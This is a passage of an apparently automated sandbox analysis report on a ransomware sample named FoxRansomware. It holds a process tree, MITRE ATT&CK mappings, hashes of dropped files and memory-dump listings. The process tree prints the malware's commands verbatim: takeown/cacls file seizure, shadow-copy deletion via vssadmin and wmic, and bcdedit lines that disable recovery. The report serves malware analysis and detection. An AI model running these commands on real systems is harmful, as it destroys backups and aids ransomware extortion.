    PID:7748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml"
    3⤵
    PID:7720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "VdiState.xml" -nobanner
    3⤵
    PID:7564
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "VdiState.xml" -nobanner
      4⤵
      PID:7704
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6060
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin""
  2⤵
  PID:7596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin" /E /G Admin:F /C
    3⤵
    PID:7752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin"
    3⤵
    PID:5376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000006J.bin" -nobanner
    3⤵
    PID:7052
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000006J.bin" -nobanner
      4⤵
      PID:7908
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin""
  2⤵
  PID:5956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin" /E /G Admin:F /C
    3⤵
    PID:7684
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin"
    3⤵
    PID:7904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000007R.bin" -nobanner
    3⤵
    PID:1852
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000007R.bin" -nobanner
      4⤵
      PID:760
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin""
  2⤵
  PID:8152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin" /E /G Admin:F /C
    3⤵
    PID:7304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin"
    3⤵
    PID:3492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000085.bin" -nobanner
    3⤵
    PID:8104
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000085.bin" -nobanner
      4⤵
      PID:536
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1464
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin""
  2⤵
  PID:7772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin" /E /G Admin:F /C
    3⤵
    PID:1144
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin"
    3⤵
    PID:5268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000008R.bin" -nobanner
    3⤵
    PID:4136
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000008R.bin" -nobanner
      4⤵
      PID:6364
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin""
  2⤵
  PID:6948
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin" /E /G Admin:F /C
    3⤵
    PID:3848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin"
    3⤵
    PID:7868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000009H.bin" -nobanner
    3⤵
    PID:1432
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000009H.bin" -nobanner
      4⤵
      PID:7260
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin""
  2⤵
  PID:4504
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin" /E /G Admin:F /C
    3⤵
    PID:5628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin"
    3⤵
    PID:5208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "000000AD.bin" -nobanner
    3⤵
    PID:7020
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "000000AD.bin" -nobanner
      4⤵
      PID:7328
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5924
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin""
  2⤵
  PID:6288
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin" /E /G Admin:F /C
    3⤵
    PID:5224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin"
    3⤵
    - Modifies file permissions
    PID:9136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "000000AN.bin" -nobanner
    3⤵
    PID:5972
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "000000AN.bin" -nobanner
      4⤵
      PID:7860
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin""
  2⤵
  PID:5844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin" /E /G Admin:F /C
    3⤵
    PID:5568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin"
    3⤵
    PID:5700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "000000B3.bin" -nobanner
    3⤵
    PID:9100
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "000000B3.bin" -nobanner
      4⤵
      PID:4488
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6684
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin""
  2⤵
  PID:5420
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin" /E /G Admin:F /C
    3⤵
    PID:9156
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin"
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000009.bin" -nobanner
    3⤵
    PID:1216
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000009.bin" -nobanner
      4⤵
      PID:7172
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3328
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin""
  2⤵
  PID:9140
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin" /E /G Admin:F /C
    3⤵
    PID:6616
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin"
    3⤵
    PID:9072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000000N.bin" -nobanner
    3⤵
    PID:9088
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000000N.bin" -nobanner
      4⤵
      PID:6960
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin""
  2⤵
  PID:7488
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin" /E /G Admin:F /C
    3⤵
    PID:6680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin"
    3⤵
    PID:6440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000011.bin" -nobanner
    3⤵
    PID:5976
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000011.bin" -nobanner
      4⤵
      PID:6272
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin""
  2⤵
  PID:3392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin" /E /G Admin:F /C
    3⤵
    PID:4776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin"
    3⤵
    PID:4988

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\XvzRjL1W.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:6068
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:6780
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:7852
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:6500
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:6512
- C:\Windows\system32\schtasks.exe
  SCHTASKS /Delete /TN DSHCA /F
  2⤵
  PID:6520

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\BHO\#KOK8_README#.rtf

Filesize
8KB

MD5
bd26ec38ef60fca8d57473e72f4e767c

SHA1
e728630bbcd51dbe346c89f1f10d55aca6174812

SHA256
f909b54be18d73c80f3ea230383c247b398a5dc94cc85ebb835d894540888617

SHA512
80946bf22db34912412f7bc455332b43435adcc6ef0eade6550485529d47e96e1873e50a4ad4b3ecf78b867ab0dbe45970de7f464220f3720da681d3c0ba2d5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
063be5cce0588ba8ec57cd28ed0a337b

SHA1
33f3c603651705fb52fe64ebb9097aac709ef0e7

SHA256
799328b87fae0e196adcfda8ced3c79fa9a2620db9b7dca23d3d0c64cf52b298

SHA512
b28b22969ed13f5921f18db0750f1bce6c1b723a03efb11ebef0e3f8d641d374ace4480e001560ab354ce397f351bcb53e7f5a2949315a8aa6d7ddc3f2cd70b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWrZTmHr.exe

Filesize
1.2MB

MD5
c82d64850d35cc6a536c11adbd261cf6

SHA1
9f4d070a1b4668d110b57c167c4527fa2752c1fe

SHA256
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1

SHA512
777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Nl5Yy8XP.txt

Filesize
16B

MD5
17d432845dc7cb55ac69d75cf72f7f5d

SHA1
7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3

SHA256
a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4

SHA512
25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat

Filesize
226B

MD5
1e4e53d817ca78469ecf7989ec4e7943

SHA1
45ad455d0a7458fc3af2a1ea8703c11ea3173a08

SHA256
3dad087bfdb6ed12b379113b37607b68e356e30da64aa8afd63c597c65793228

SHA512
265bc3f14f7181968d5c84f239b7303c73f000dc7c0c59ac74e99ee17494071463cc3c207a1fc94a8462e7a97815e45f4d754693e398707c26d291cc44e12776

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_18C82E76CF25D842.txt

Filesize
5KB

MD5
a795dba0052523d20ae26f36fb86cf08

SHA1
7929694e76e10cf37fa6d4d29c35f69089c1d22c

SHA256
f664d91211f8c8f85e11274e1cd988a9dbc4e45a2ea246159f8f55fbad14b68a

SHA512
ac141eba50461157f7881e9a592371cc543d139c9adcbc1ea354961d115cc67d135ab98d91f027b4f762fee9524aec41e9ebc18189352062d84e48ea8846c792

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_18C82E76CF25D842.txt

Filesize
41KB

MD5
4970ca8876954137b69fbf6aeb2e9a6d

SHA1
8a034e334f0ee10b8f1bcf2af052f3f8e1885a08

SHA256
ab29e1ae7d057e7a26602fe78c61bc31ebe0545a8956fe6bd730778b67de16b9

SHA512
51691eee0bfa8c40cb9af3217d85dc1679df69634770979bc7b2e8adfa7cbbfc6e6881464370fa5f8afdb257507d888ea2a1c28f928ddad2612031714ac298a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\K91plEdw64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vgn53uh0.h0e.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\6JGMEJxE.vbs

Filesize
260B

MD5
0cd59102bb04f4009097a66af53cdd2e

SHA1
dab16a7f0f99c2964d82f7dff55732cb5fd6f008

SHA256
903a2108cb5ec1f46eb54ce8c59da8e0d7a9558970f1673affaabf6421583e45

SHA512
726c0a39e7bfba88a6231f58bae8cea26f0a7d1189266fe3945c46d3e42ede13a1dae4b6b30c974a2db3bbfc1aa86ab73d4f4cd695e6bd18ba13edfeb952f20f

Download Submit
C:\Users\Admin\AppData\Roaming\XvzRjL1W.bat

Filesize
265B

MD5
92240dcc57b005c34fec34deb3715c6a

SHA1
fefbe5b0b4c952e44265c02a86ff22484845164d

SHA256
b7560f5aed90c39e1a5c241ea0a0593da5631f28921db834af43101b99c16169

SHA512
db5cdf2dbf5a4382fdc9d8b23a5f59363d40f6c429e3aa9f077619434a4a4d2cbaa67e4cc2314a69354741b503907f0eb423ed83137ce31e0683e90531a5f02e

Download Submit
memory/432-6858-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1620-6841-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1800-6799-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1800-6798-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3092-6899-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3196-14-0x0000000005740000-0x00000000057A6000-memory.dmp

Filesize
408KB

Download
memory/3196-8-0x0000000073ED0000-0x0000000074680000-memory.dmp

Filesize
7.7MB

Download
memory/3196-13-0x0000000005660000-0x00000000056C6000-memory.dmp

Filesize
408KB

Download
memory/3196-12-0x0000000004E70000-0x0000000004E92000-memory.dmp

Filesize
136KB

Download
memory/3196-11-0x0000000004F40000-0x0000000005568000-memory.dmp

Filesize
6.2MB

Download
memory/3196-27-0x0000000007550000-0x0000000007BCA000-memory.dmp

Filesize
6.5MB

Download
memory/3196-26-0x0000000005D60000-0x0000000005DAC000-memory.dmp

Filesize
304KB

Download
memory/3196-25-0x0000000005D10000-0x0000000005D2E000-memory.dmp

Filesize
120KB

Download
memory/3196-10-0x0000000002550000-0x0000000002560000-memory.dmp

Filesize
64KB

Download
memory/3196-31-0x0000000073ED0000-0x0000000074680000-memory.dmp

Filesize
7.7MB

Download
memory/3196-28-0x0000000006220000-0x000000000623A000-memory.dmp

Filesize
104KB

Download
memory/3196-7-0x0000000002410000-0x0000000002446000-memory.dmp

Filesize
216KB

Download
memory/3196-9-0x0000000002550000-0x0000000002560000-memory.dmp

Filesize
64KB

Download
memory/3196-24-0x00000000058B0000-0x0000000005C04000-memory.dmp

Filesize
3.3MB

Download
memory/3344-6760-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3868-6820-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3868-6843-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3876-6897-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4340-6834-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4356-6889-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4676-6805-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4688-6938-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4724-6759-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/4784-6813-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4784-6790-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4932-6822-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4932-6823-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5312-6895-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5340-6974-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5424-6898-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5536-6856-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5592-6867-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5624-6828-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5696-6894-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5720-6826-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5772-6880-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5812-6958-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5920-6885-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6064-6854-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6168-6864-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6256-6946-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6276-6944-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6304-6896-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6316-6847-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6316-6848-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6356-6836-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6356-6837-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6456-6869-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6540-6793-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6540-6792-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6568-6778-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6612-6993-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6632-6887-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6704-6776-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6720-6963-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6908-6953-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7020-6852-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7092-6919-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7128-6860-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7356-6951-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7364-6801-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7416-6891-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7444-6781-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7456-6786-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7532-6839-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7616-6981-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7620-6976-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7664-6991-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7720-6979-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7776-6830-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7800-6940-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7800-6795-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7840-6832-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7856-6893-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7888-6862-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7908-6986-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7968-6845-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/8028-6809-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/8028-6956-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/8032-6803-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/8112-6815-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
